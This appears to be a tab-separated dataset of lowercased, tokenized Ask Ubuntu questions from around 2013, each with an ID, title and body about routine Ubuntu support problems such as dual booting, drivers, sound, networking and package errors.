388168	how to run installed ubuntu on windows 7 ?	i installed ubuntu 12.04 alongside windows 7 . but i need to know is there any way to run my installed ubuntu using some virtual machines on windows 7 ? mention that the ubuntu is installed on my laptop boot .
388172	basic trouble shooting for kernel panic - not syncing : attempted to kill inint ?	how do i troubleshoot this ? i 'm booting off usb flash drive and it kernel panics . but my screen is small , so do n't see anything but a bunch of hex codes and this message : kernel panic - not syncing : attempted to kill inint ! i booted into live cd and mounted drive , but nothing in /var/log was updated . how do i get output form this kernel panic ? console scroll and logs do n't work .
388173	how to enable right-to-left in basket note	i 'm using basket note for my studies , which is in hebrew . with ubuntu 13.04 and older i could have switched from ltr to rtl easily by clicking r ctrl+r shift . it does n't work anymore ... any idea on what i should do to return it ? thanks .
388174	i have installed ubuntu , can not access windows 7 and data	i have a laptop which has windows 7 on it with 8gb ram and 1tb hard disk ( single c partition ) . i thought of learning linux and wanted to get ubuntu . so , i got it into usb and while installing it gave 2 options : 1 ) install ubuntu while replacing windows 7 files 2 ) some other . i have choosen 2nd option and made a new partition . ubuntu is installed successfully . when i reboot i dont see windows options and i tried to find windows files from file system in ubuntu , but no luck : ( i have treid boot repair and here is the url : http : //paste.ubuntu.com/6544538/ in boot-repair , the option to repair windows file is not enabled : ( . so not able to try that . my concern is about the data . i am fine if i dont have windows . i need to recover that data some how . please help me . i am new to ubuntu and terminal . any help , suggestions are appreciated . please let me know if more details are needed . thanks for your time .
388177	skype sond not working properly	i 've been using skype on ubuntu 13,04 for some time now and just updated to ubuntu 13.10 , now i can still use skype but sound buggs . when i start skype it works fine , i do the sound test on skype and all is well . but as soon as a friend logs on it starts buzzing non stop until i close skype . then when i recieve a skype call i cant hear the persone talking unless i end the call and send one myself . its not a major issue but i 'm wondering if others have this kind of trouble too and if you have a solution to offer .
388180	application accessing	in our organization we are using ubuntu 12.4 in that we have installed two software that software has to be access by other branches of our organization through internet by using ip address for windows platform systems is that possible to access or we have to make the windows system to come under domain or else there is any way to access like that ?
388183	wirless stopped working in ubuntu 13.10 on hp pavillion dv6000	i 'm using a hp pavillion dv6000 running ubuntu 13.10 and it was working fine for a while but about an hour after it updated my wireless connection went out and when i go into the system settings it says it is on airplane mode which i can turn off by sliding the on/off switch but when i try to turn on the wireless it will not it will just slide right back to off when i let go of the mouse . it will not recognize that there are ant wireless networks but my the other computer i use which is a mac shows all networks around and can connect so it has to be a bug or something in ubuntu can someone please help me fix this very frustrating do n't want to have to reinstall ubuntu on my computer again
388184	how can i migrate from single-partition ubuntu to dual-booting ubuntu/windows 8 ?	i am currently running 12.04 on a single partition , no encryption . i have some windows-only software [ * ] that i need to run , so i want to migrate to a 13.10 ( with full disk encryption ) / windows 8 dual boot . how can i do this ? notes : i have my original windows discs . i have backed up my data , so i do n't mind starting from a blank slate ( i.e . i can avoid a 12.04 > 12.10 > 13.04 > 13.10 upgrade path ) . [ * ] i 've tried both wine and virtualbox , but neither is performant . i 'm obviously appealing the developer for an ubuntu version , but i need a short-term solution : )
388189	what is ubuntu 's *-series ?	i read that u-series ubuntu release that will be delivered in october 2014 , designated 14.10 is not derived from another series . what is this u-series and what are the other series ? is there going to be a major change in the kernel architecture or something else ?
388190	how do i remove windows vista off my ubuntu laptop ?	i have ubuntu 13.10 installed as a dual boot and i no longer want windows vista on my laptop . what is the easiest way to remove vista from ubuntu ?
388192	when to use -f or -a tag in if loop	i 'm confused between two tages that can be used in if statement in bash scripting . one is -f and other is -a . their description states as follows : [ -f file ] true if file exists and is a regular file . [ -a file ] true if file exists . now , while using the if condition in my shell script how can i know which tag should i use . like i have a script which takes regular backups using tar and creates a file file-name.tar.gz so how can i know which is a regular file . thanks .
388194	uk keyboard problem , 13.10 upgrades	i have now upgraded 3 laptops and a desktop to 13.10 and all have developed the same problem . they are all uk keyboards , with 'english ( uk ) ' set as the keyboard . the keyboard layout looks exactly right in each case on the keyboard layout chart . but they all are unable to create quotation marks with . all of them have had intermittent problems with the @ sign that seem to settle ( it 's working now on this laptop ) . anyone able to help , please ? thanks , a ps incidentally , they have all had intermittent problems with an invisible mouse pointer , but that 's another topic !
388196	install ubuntu with android in samsung galaxy note	hi i am a user of samsung galaxy note 10.1 and i just have seen an app `` ubuntu for android '' i have android 4.1.2 in my note . please tell me if i am able to use both ubuntu and android in the tablet ( like a formatted desktop which can use various os at a time ) and if it is possible please try to tell me the process
388207	mouse input writing chars to terminal	this has been driving me mad lately . started about 2 days ago . whenever i perform certain mouse actions over top of a terminal random chars are being inserted into the terminal . for instance r/ # r/ is printed at the bash when i left click in the terminal . the first half r/ on mouse down and the second half # r/ on release . the output changes seemingly for different areas of the screen when i click . this is the result after two clicks in the same location and two clicks in different locations : ` [ . # [ . [ . # [ .` ( # ` ( m. # m.` using the mouse wheel also causes similar output that changes based on location . right click behaves normally . i ca n't select any text in the terminal . when i try to select text it just drops the button down chars and waits for the release and drops the next chars . currently running ubuntu 13.10 64bit
388209	need help with accounts permissions set up please ?	running ubuntu 12,04 lts i have three accounts , let say a1 , a2 and a3 ... i would like a1 to have full access and full permissions on a1 , a2 and a3 ... i would like a2 to have full access and full permissions on a2 and a3 ... i would like a3 to have only access to a3 itself ... then i would like to delete the groups ( if possible ) ... how to write this in a terminal line command please ? thank you
388211	what went wrong ?	after downloading the 32-bit version i was not able to open the file . an error message displayed `` application not found '' . what happened and what should i do now ?
388214	no -r ( recursive ) option in ctags	i am using 12.04 lts , i had installed ctags ( exuberant ) but while installing at end i am getting following log : unpacking exuberant-ctags ( from ... /exuberant-ctags_1 % 3a5.9~svn20110310-3_i386.deb ) ... processing triggers for man-db ... setting up exuberant-ctags ( 1:5.9~svn20110310-3 ) ... update-alternatives : error : no alternatives for etags . update-alternatives : using /usr/bin/ctags-exuberant to provide /usr/bin/etags ( etags ) in auto mode . i wanted to use -r option in ctags which was available generally in other distributions of linux but in ubuntu its not their , also while accessing man page for ctags its opening man page of elvtags .
388217	dock icons settings lost after reboot	i have installed 12.04 on my desktop machine , everything works fine except for a few annoyances . all modifications i do to my dock ( i add/remove icons ) are lost upon reboot/logout . if it helps , i 've done a clean system install but i have been keeping my home folder . my previous system was 13.10 .
388219	data recovery in ubuntu 13.04	i am currently using ubuntu 13.04 along with windows 7 . but i want to recover my data which is deleted by shift+delete in ubuntu 13.04 , is there any way recover it .
388221	command line program to show speaker monitor details	is there a command line program ( available in ubuntu ) to display details ( e.g . alsa_output.pci-0000_00_1b.0.analog-stereo.monitor ) of the speaker monitor ? i want to be able to use these details to provide a -f parameter when using ffmpeg to capture sound played through the speakers .
388225	gimp saves as xcf extension	i used to use irfanview to edit my files but it stopped working a couple of days ago so i switched to gimp but i ca n't seem to find a way to save a file other than xcf .
388228	access wamp server running in virtualbox from outside with ubuntu as host	i 'm hosting on a wampserver running in windows xp as guest in vbox , host is ubuntu 12.04 . & i 'd like to access my site from outer network , i 've double checked all configuration & i believe it to be right , however still encounter an error . here 's a setup : vbox on ubuntu 12.04 as host wampserver on win-xp as guest d-link router port forwarding to 192.168.1.3 & & 192.168.1.4 under ubuntu host file i have : 192.168.1.3 domain-on-winxp.com & & 192.168.1.4 domain-on2-winxp.com under win-xp host file i 've configured the vhost-doamin-names to localhost i 've configured win-xp for a bridged network . i can browse domain-on-winxp.com on win-xp & & ubuntu on a browser , but when i try to access it from outside network via a online-proxy sites i get a page not found or page ca n't load error . i 'm using dns service from dnsexit.com & installed the client on win-xp to update my ip . i simply can not understand what 's the glitch ? ifconfig output eth0 link encap : ethernet hwaddr bc:5f : f4:67 : f4:86 inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :be5f : f4ff : fe67 : f486/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:41 errors:0 dropped:0 overruns:0 frame:0 tx packets:58 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8200 ( 8.2 kb ) tx bytes:8460 ( 8.4 kb ) interrupt:47 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:958 errors:0 dropped:0 overruns:0 frame:0 tx packets:958 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:60668 ( 60.6 kb ) tx bytes:60668 ( 60.6 kb ) vboxnet0 link encap : ethernet hwaddr 0a:00:27:00:00:00 inet addr:192.168.56.1 bcast:192.168.56.255 mask:255.255.255.0 inet6 addr : fe80 : :800:27ff : fe00:0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:58 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:9644 ( 9.6 kb ) ipconfig from winxp guest windows ip configuration host name . . . . . . . . . . . . : algby-21c8b4d99 primary dns suffix . . . . . . . : node type . . . . . . . . . . . . : unknown ip routing enabled . . . . . . . . : no wins proxy enabled . . . . . . . . : no dns suffix search list . . . . . . : home ethernet adapter local area connection : connection-specific dns suffix . : home description . . . . . . . . . . . : amd pcnet family pci ethernet adapter physical address . . . . . . . . . : 08-00-27-e1-be-06 dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes ip address . . . . . . . . . . . . : 192.168.1.4 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.1.1 dhcp server . . . . . . . . . . . : 192.168.1.1 dns servers . . . . . . . . . . . : 192.168.1.1 192.168.1.1 lease obtained . . . . . . . . . . : monday , december 09 , 2013 12:36:15 am lease expires . . . . . . . . . . : tuesday , december 10 , 2013 12:36:15 am
388229	ubuntu 13.10 - desktop freezes when opening or importing a large size image ?	i tried to add a raster layer to my qgis dufour ( memory size of the image was 52 mb ) and the desktop freezed . it is not just qgis , i have also tried to open this image via image viewer and it has also caused desktop to freeze . any ideas how to fix this ? thanks in advance ! ! !
388234	unable to get login prompt	i have used ubuntu server 12.04 version ( no desktop only command line ) . i have installed lampp server and crtmpservers and modified code rc.local file to start lammp server and crtmp server at the time booting . upto here everything okay . but after rc.local file modification rebooting system , but here serveries were started quite good , but no login prompt comes . how can i get login prompt to update the code in server machine .
388236	the atheros ar8161 alx.ko slow with 3.11.0-14	when i boot my machine with the 3.11.0-14 kernel configuration my ethernet card is very slow . i talk about less than 1/3 of the speed when i boot de machine with the 3.11.0-13 kernel configuration . both are the default kernels form kubuntu . what can i do to find the problem ? andy
388237	how to install openbexicreative-4.1 in ubuntu 13.04	how can i install openbexicreative-4.1 in ubuntu13.04 . i downloaded it from sourceforge.net . i tried the terminal to ./configure but shows no such file .
388238	libreoffice freezes when accessing remote files ( samba / smb share )	i am working on ubuntu 13.04 and i have a network in which there are also some windows pcs . when i try to open some excel or word file from the windows pc , libreoffice hangs and shows a white screen only . everything else is working fine except libreoffice . when that happens , i ca n't open other spreadsheet or doc files from my local machine until reboot . sometimes the file got corrupt on the windows machine .
388239	changing how the ctrl key works in ubuntu ?	on my ubuntu installation , the ctrl key works a lot like the caps lock key . if you press it once , the key stays on , and you need to press it again , in order to turn it off . is there any way that i can make the ctrl function more like the shift key ?
388243	what is the difference between mcrypt and scrypt ?	from man mycrpt , i see that it is a tool to apply one of the algorithms ( ciphers ? ) specified in mcrypt -- list-hashes . whereas scrypt is an algorithm in and of itself , so the tool can apply only that . is this correct ?
388245	sound stops working after i close my laptop lid	my laptop 's ( hp envy touchsmart 15 , running ubuntu 13.10 ) audio stops working after the laptop sleeps or if i close my laptop lid ( the current setting are the on closing the lid the laptop does not go to sleep ) . another thing i have noticed the light on the mute button does not also work after the sound stops ( the keyboard backlit lights still work ) . my laptop has a subwoofer as well - this could be the problem ... . i have tried to follow the steps to restart the sound ( i.e . kill pulseaudio and restart ; uninstall pulseaudio and reinstall ... ) when i run lsof | grep pcm ( i do n't know what this means but saw it on a tutorial to fix audio ) ; i see 10 things - let me know if i should copy and paste it here . the sounds work if i restart the laptop . is there any way to restart the audio with restarting the laptop ... . many thanks
388247	wi-fi not working on my compaq mini 700 after installing lubuntu 12.04	wi-fi worked fine pre to installation of lubuntu . now you ca configure the network but there is no wifi network shown . the problem is that there is no wired lan port so i ca n't do some updates etc . any simple solution available for solving this ? /lassse
388250	playing minecraft in ubuntu - black lines	help me please . complete novice on ubuntu ( on day 2 ) and trying to get this working for son for his christmas present ( one of many ! ! ! ) i have ubuntu 13.04 installed , have followed the instructions to download java and i am launching by opening with oracle java 7 runtime ( manually by selecting open with ) when the screen comes up to play it looks like black slashes and lines / flashing triangles through , glitchy ? ? ( not very technical i know ! ! ) the same funky lines / triangles have shown up sometimes when just running ubuntu , but not to the extent that it does on minecraft . what am i doing wrong ? i have recently purchased the asus a85xm-a mother board and installed this myself with a total of 8gb memory too . i am running ubuntu through a 64gb usb stick . this is what was recommended to me to get and do by the guys at maplin . heeellllpppp ! please : ) thanks kerry
388252	ubuntu server installation information on rights	visual information about ubuntu server installation need . how to install virtual desktop inform you bilirmisiniz . thank you for your help
388256	how do i connect to any 4g lte wireless router ?	i was using a 4g wimax modem until last week when i decided to upgrade to the newly introduced 4g lte service from my network provider ( swift , nigeria ) . ever since , it 's been totally impossible to have a successful connection wireless except through ethernet . when i reboot my pc , a wireless connection is usually immediately established , but in few seconds it disconnects again . my pc is an hp 650 and i use ubuntu 13.10 . my router model is huawei lte cpe e5172 . i have also tried to use the huawei e5776s-601 wifi , and it has the same problem . i am a brand new linux user , and i am also a rookie in programming , and so i 'll appreciate step by step information , preferable with screen shots ( if possible ) to solve this problem . i trust to get a power response . thanks .
388260	upgrade from ubuntu 12.10 to 13.10 - effect on boot	i have a triple boot system : ubuntu 12.10 , windows 7 & windows xp . when installing ubuntu 12.10 , following various on-line guides , i created a separate boot partition for ubuntu so that the windows boot files in the mbr would not be overwritten . this worked perfectly , and everything has been running smoothly . my question is , if i upgrade to ubuntu 13.10 by selecting the 'upgrade ' option from the 'installation type ' menu , will the installation seamlessly retain the existing ubuntu boot partition , or will it revert to the default mbr ?
388262	decrypt axcrypt encrypted file	i would like to un-encrypt files that i had previously encrypted with axcrypt . there does seem to be a linux version on their website , but when i run it , i get windows related errors , and when i run it with wine i get that it is an invalid .exe format . i do n't really need to use the axcrypt program , as long as i 'm able to decrypt my text files i 'm happy . i know axcrypt uses aes encryption , so has anyone had any success decrypting an axcrypt file with another aes encryption program ? while i 'm waiting for responses , i 'll start digging through the source code to see if i can find anything .
388263	pci-e to pci adapter for dvb-cards	does anyone know if something like this would work in ubuntu ( mythbuntu ) to let me use 2 dvb-c-cards on a motherboard that only has pci-e slots ?
388264	why am i getting this error , when i tried to access one of log file	( gvim:5878 ) : ibus-warning ** : the owner of /home/ ( user ) /.config/ibus/bus is not root !
388265	how can i choose a certain tty color ?	i know this table : [ code ] if [ `` $ term '' = `` linux '' ] ; then echo -en `` \e ] p0232323 '' # black echo -en `` \e ] p82b2b2b '' # darkgrey echo -en `` \e ] p1d75f5f '' # darkred echo -en `` \e ] p9e33636 '' # red echo -en `` \e ] p287af5f '' # darkgreen echo -en `` \e ] pa98e34d '' # green echo -en `` \e ] p3d7af87 '' # brown echo -en `` \e ] pbffd75f '' # yellow echo -en `` \e ] p48787af '' # darkblue echo -en `` \e ] pc7373c9 '' # blue echo -en `` \e ] p5bd53a5 '' # darkmagenta echo -en `` \e ] pdd633b2 '' # magenta echo -en `` \e ] p65fafaf '' # darkcyan echo -en `` \e ] pe44c9c9 '' # cyan echo -en `` \e ] p7e5e5e5 '' # lightgrey echo -en `` \e ] pfffffff '' # white clear # for background artifacting fi [ /code ] how can i choose a certain tty color from this table ?
388267	ca n't remove bad package	ubuntu 12.04 server ( command line only ) . ca n't do any upgrade/update due to unmet dependencies : supervisor @ assembler : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libxml2 : depends : liblzma5 ( > = 5.1.1alpha+20120614 ) but 5.1.1alpha+20110809-3 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies supervisor @ assembler : ~ $ supervisor @ assembler : ~ $ sudo apt-get remove liblzma5 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libkdecore5 : depends : liblzma5 ( > = 5.1.1alpha+20110809 ) but it is not going to be installed librpmio2 : depends : liblzma5 ( > = 5.1.1alpha+20110809 ) but it is not going to be installed libxml2 : depends : liblzma5 ( > = 5.1.1alpha+20120614 ) but it is not going to be installed xz-utils : depends : liblzma5 ( > = 5.1.1alpha+20110809 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . supervisor @ assembler : ~ $ supervisor @ assembler : ~ $ sudo apt-get remove libxml2 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gstreamer0.10-plugins-base : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed gstreamer0.10-plugins-good : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed kdoctools : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libapache2-mod-php5 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libgstreamer0.10-0 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libisc83 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libplist1 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libraptor2-0 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed librrd4 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libsoup2.4-1 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libstreamanalyzer0 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libxml2-utils : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed libxslt1.1 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed php5-cli : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed python-libxml2 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed python-sqlitecachec : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed shared-mime-info : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed virtualbox-4.2 : depends : libxml2 ( > = 2.7.4 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . supervisor @ assembler : ~ $ how to fix this trouble ?
388271	tata photon plus can not establish connection after photon 's system upgrade	my laptop is running on ubuntu 12.04.3 and using tata photon plus dongle . i configured the device through the network manager options . it worked seamlessly . few days back i received message from tata photon that `` we are upgrading our network for a better experience . click activate on your photon dialer settings & enter 0000 as pin to enjoy uninterrupted serives '' . since then photon connection has stopped working though my laptop is detecting the dongle when it is plugged in but it can not establish the connection . i am not able to find any solution . any help would be really appreciated . update -- to further explain my problem , i have noticed that `` enable mobile broadband '' option is checked though the `` mobile broadband '' icon is `` not enabled '' . i notice these symbol on the tray .
388272	when new strings to be translated will be available on launchpad for the next release ?	does anybody know when new strings to be translated will be available on launchpad ? if i try to open the translation page for this new version , i receive this notification : translations for this release series are not available yet . however in the past translations were available in advance .
388274	problems installing a samsung clp325 colour laser printer under ubuntu 13.10	i have ( unsuccessfully ) tried to get my samsung clp325 colour laser printer to work under ubuntu 13.10 . the best i seem to achieve is in black and white mode - but this is unacceptable . has anyone managed to install and use the full facilities of this printer ? if so , could you please let me know how you did it ? thanks in advance .
388277	xampp not working	i am new to ubuntu . i have installed xampp and i have been using it for 2 months without any problem . i was able to access xampp by typing 'localhost ' on the browser . 3 days back i have installed drupal from ubuntu software center and now if i try to start xampp using sudo /opt/lampp/lampp start the message i get is this , starting xampp for linux 1.8.1 ... xampp : another web server daemon is already running . xampp : another mysql daemon is already running . xampp : starting proftpd ... xampp for linux started . and if i try to access localhost , i am getting a page saying , it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . from this message i understood that the localhost have been changed to /var/www from /opt/lamp . so i tried to uninstall drupal from software center , but still the problem remains . i need xampp back . could anyone please suggest how can i solve this ?
388279	raw processing grainy under ubuntu 12.04 ?	i try to convert raw files to jpgs in ubuntu 12.04 ( 64bit ) . i used ufraw , rawtherapee and darktable . all 3 converters seem to have problems since there are `` hot pixels '' ( black dots in the resulting image ) and the result in general is quite grainy . even if i adjust the noise-reduction settings , i ca n't get satisfying results . is this a bug of ubuntu or does anybody have an answer ? thank you
388280	black screen , x cursor after boot	whenever i boot to ubuntu 13.10 , it goes to a black screen with my cursor that looks like an a x . there is also a system program problem detected message box in my used theme , and i can switch to console logins fine . i have already tried booting with nomodegui or whatever that is , and it does n't solve the problem .
388281	ublox modem connected but cant browse	i have ubuntu 12.04 running on two different machines . the one machine has ubuntu 12.04 with lxde running . i installed the network manager and setup a broadband connection to my ublox modem . it connects fine and i can see connection info and ppp0 in ifconfig , but i cant browse the internet nor ping google . after a while , the modem disconnects ( do n't think this is related though ) . if anyone can help me with this , i 'd appreciate it . thank you
388286	help understand diff between : sort < file.txt vs file.txt | sort	so im learning ubuntu ( for the first time ) and am reading trough ubuntu server book chapter 14 says filename.txt | sort will give me an output with the content of the file , but sorted however it does n't mention if i can type in : filename.txt | sort > sortedfilename.txt to create a new file this time with sorted content , can i ? it does state that i could type in sort < filename.txt and again , get a sorted output of the files content it continues to mention i can type in sort < filename.txt > sortedfilename.txt and create a file with sorted content so are these two different ways to do the exact same thing ? thank you !
388287	why does `` monitor of built-in analog audio '' has no sound ?	i started with linux for about 4 or 5 months , moved from mint 15 to ubuntu 12.04 and i 'm loving it all . still getting used to terminal commands and the variety of software i can find here . i currently have a let 's play channel on youtube , so , i need to record gameplay footage ( video and audio ) along with microphone audio ( in a separate file , with audacity ) . i found a software called simple screen recorder ( ssr ) to record gameplay video and audio footage , i have checked the website for instructions on how to adjust the things and the problems began . first , the video is recorded just fine , it 's the simplest software i could find to set up the configurations and get it up and running . problem is , no gameplay audio , no system audio . audacity records the microphone just well , so i started to take a look on the configurations on pulseaudio volume control while recording something with ssr . many tutorials tell to change the audio imput to monitor of built-in analog audio in order to record the gameplay audio , but this did not work to me here . i suspect that this monitor of built-in analog audio is not configured or that it does not have audio to be recorded at all , how can i fix this ? thanks you for your attention !
388288	installing ubuntu 12.04 : ethernet visible but does n't connect	i installed ubuntu 12.04 on my desktop computer , but during the install it could n't connect to internet via the ethernet cable . i installed it anyway ( erasing my old windows ) , and now when i open the `` edit connections '' -meny the wired connection appears . but i ca n't access internet . it will take a long time to write what i get in the terminal here ( because i write from another computer now and obviously ca n't copy from the other one ) . for example ifconfig and other commands . i can get you specific numbers or phrases if you tell me what to write in the terminal ! please tell me what you need in order to help me . i have read a lot of other forum threads on this but it did n't help me . i have no idea if i have a large or a small problem . maybe it is just some internet setting that is wrong . please help , the computer is useless without internet because without it i ca n't get all the add-ons , drivers and `` third-party-programss '' i missed during the installation . now i ca n't use any usb-devises for example . isak
388289	why is share button unavailable in ubuntu one ?	so , my that file is already uploaded and is in ubuntu one folder but share button in right click context menu is unavailable . please help what to do
388291	properties pie chart of external hard drive does not update	i have an lacie external hard drive which is 1tb big . i use it mostly for backups but lately i have found that it 'lies ' about the size available . this is a screenshot of the properties dialog when i delete something from the hard drive , the number after contents ( 662.4gb ) changes but the number after free space ( 72.0gb ) does n't . no matter what i do , the used and free number do n't change and i keep having only 72.0gb available which is , exusez le mot , bullshit .
388294	uninstall ubuntu 13.10 and install ubuntu 12.04	my problem started with win7 . it was all good till it got stuck on the windows sign and never went past that . checked the hardware but everything is in order . so i installed my favourite os which is ubuntu ( 13.10 in this case ) as a dual so i wo n't lose my win7 files . i have been using ubuntu for a month now and now i get this send report notifications at the startup . it got more and more and became really annoying that it started getting stuck at startup . now i want to install ubuntu 12.4 ( hoping i would n't get those notifications ) , but i ca n't . here is the main issue . when i installed ubuntu 13.10 i got a menu at the beginning to chose win7 or ubuntu ( among other options ) . win7 does n't work and ubuntu wo n't installed an older version of itself . i have the ubuntu system on usb but it appears i ca n't boot from it . i have tried all the functions while restarting . note that the i have chosen boot from usb as a primary . my laptop is an asus . if you have questions and suggestions i will be more than happy to answer and try .
388297	can not find video plugin : video/x-gst-fourcc-avin-decoder	i try to cut a video in pitivi and get the following error : missing file : video/x-gst-fourcc-avin-decoder the problem : i do not find any plugin with that name . which plugin solves the problem then ? the output of avconv -i video_filen_ame is avconv version 0.8.9-6:0.8.9-0ubuntu0.13.10.1 , copyright ( c ) 2000-2013 the libav developers built on nov 9 2013 19:09:46 with gcc 4.8.1 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from '1.mov ' : metadata : major_brand : qt minor_version : 537199360 compatible_brands : qt creation_time : 2013-11-12 15:14:31 duration : 00:02:00.96 , start : 0.000000 , bitrate : 115200 kb/s stream # 0.0 ( eng ) : video : dv , 1920x1080 , 113664 kb/s , 25 fps , 25 tbr , 25k tbn , 25k tbc metadata : creation_time : 2013-11-12 15:14:31 stream # 0.1 ( eng ) : audio : pcm_s16be , 48000 hz , stereo , s16 , 1536 kb/s metadata : creation_time : 2013-11-12 15:14:31 stream # 0.2 ( eng ) : data : tmcd / 0x64636d74 metadata : creation_time : 2013-11-12 15:16:08
388300	new kernel installed , but not in /boot	i recently had some troubles booting my ubuntu server so i decided to boot an older kernel , remove the new kernel and reinstall it . all of that went according to plan . according to this command the new kernel is installed : dpkg -l | grep linux-headers the problem is upon rebooting , the new kernel is not in the grub list ? ? ? i already did a : sudo update-grub which ran without errors . upon checking /boot i ca n't find any new kernel files there even though the new kernel is installed . how do i get my new kernel files in /boot so i can run it ?
388302	how to remove authenticated proxy from ubuntu 12.04	i used to access my internet from an authenticated proxy ethernet . hence i had created a apt.conf file under etc/apt . but now i want to access my internet without the proxy ( a proxy free internet ) so i want to remove this file . when i try to delete or edit this file , it says access is denied . please suggest what should i do to solve this problem . thanks a lot .
388303	reaper.conf configuraton of reaper generate fault	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # host mine.pool-x.eu port 9000 user user.worker pass password protocol litecoin kernel reaper.cl threads_per_gpu 1 aggression 13 worksize 256 save_binaries yes cpu_mining_threads 0 platform 0 enable_graceful_shutdown no long_polling no kernel reaper.cl threads_per_gpu 2 aggression 13 worksize 128 save_binaries yes cpu_mining_threads 0 platform 0 enable_graceful_shutdown no long_polling no # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # output : 2013-12-09 16:08:25 error 52 getting work . see http : //curl.haxx.se/libcurl/c/libcurl-errors.html for error code explanations . 2013-12-09 16:08:25 could n't connect to server . trying again in a few seconds ... why this configuration is generate this fault ? i use ubuntu 12.04 .
388304	how to use linux and install drivers ?	i am new in linux and have recently installed successfully . how do i update drivers and plugins in ubuntu ? is there any driver finder for linux or where do i download the source ? how do you install drivers ( graphic , music , lan , video etc ) ? how do you operate linux ? are there any best books or pdfs available on internet . my laptop in dual-core pentium 21174 samsung .
388305	what is the format of a log file ? ( ex . xorg.0.log ... )	for example in xorg.0.log ... [ 15708.908 ] ( ww ) and in the log files it states [ 15708.905 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown.` is the first number the time ? is there any literature on this subject ? or suggested ways to read through them and be able to make sense of them more fully ?
388306	how to reinstate dualboot after upgrading to windows 8.1 ?	i had a dual-boot setup of ubuntu 13.10 and windows 8 on my asus vivobook . initially the dual-boot setup asked for some tweaking as windows 8 insisted on being uefi started . but it worked lateron . this morning , i was silly to accept the proposed upgrade to windows 8.1 . now windows has replaced the boot manager and i no longer get asked if i want to boot to ubuntu . the computer boots straight to windows . as i really require both os 's , i have been trying to create a functional dual boot situation . i partly succeeded , but for the time being , i am stuck in a situation where the grub options are shown , and only ubuntu can be started . whenever i try any of the windows booting methods provided in the grub menu , i get a nice blue screen with the message : your pc needs to be repaired error code 0xc0000225 after return , next nice blue screen says : file : < windows < system32 < winload.efi is missing with same error code . i have csm enabled in bios , as well as `` secure boot '' option . so , how do i reinstate dualboot after upgrading to windows 8.1 ?
388313	ca n't start in virtualbox ; shows built-in shell	so i used the linux live usb creator and created a live usb checking the option to enable launching linuxlive in windows and after it was done and i ran virtualize_this_key.exe , and after a screen that said ubuntu 13.10 , all it showed was a console that said '' busybox v1.20.2 ( ubuntu 1:1.20.0-8.1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list fo built-in commands ( initframs ) '' here 's a screenshot
388314	libreoffice writer can not open a file . `` general error . general input/output error ''	when i try to open a libreoffice writer file , this error appears : `` general error . general input/output error '' . the file is stored in my local file system ( in the dropbox folder ) . file permissions are ok. what should i do ? i need to open it . i searched in google and tried some of what i read ( for example , changing the file extension ) but it did not work . i am confused . my os is ubuntu 12.04 and the version of libreoffice is 4.0.4.2 . thanks in advance .
388315	ca n't format or delete partitions in pendirve cause of gpt table error	this is what i got while trying to format a partition in my pendirve : error deleting partition /dev/sdb1 : command-line `parted -- script `` /dev/sdb '' `` rm 1 '' ' exited with non-zero exit status 1 : warning : /dev/sdb contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? error : both the primary and backup gpt tables are corrupt . try making a fresh table , and using parted 's rescue feature to recover partitions . ( udisks-error-quark , 0 )
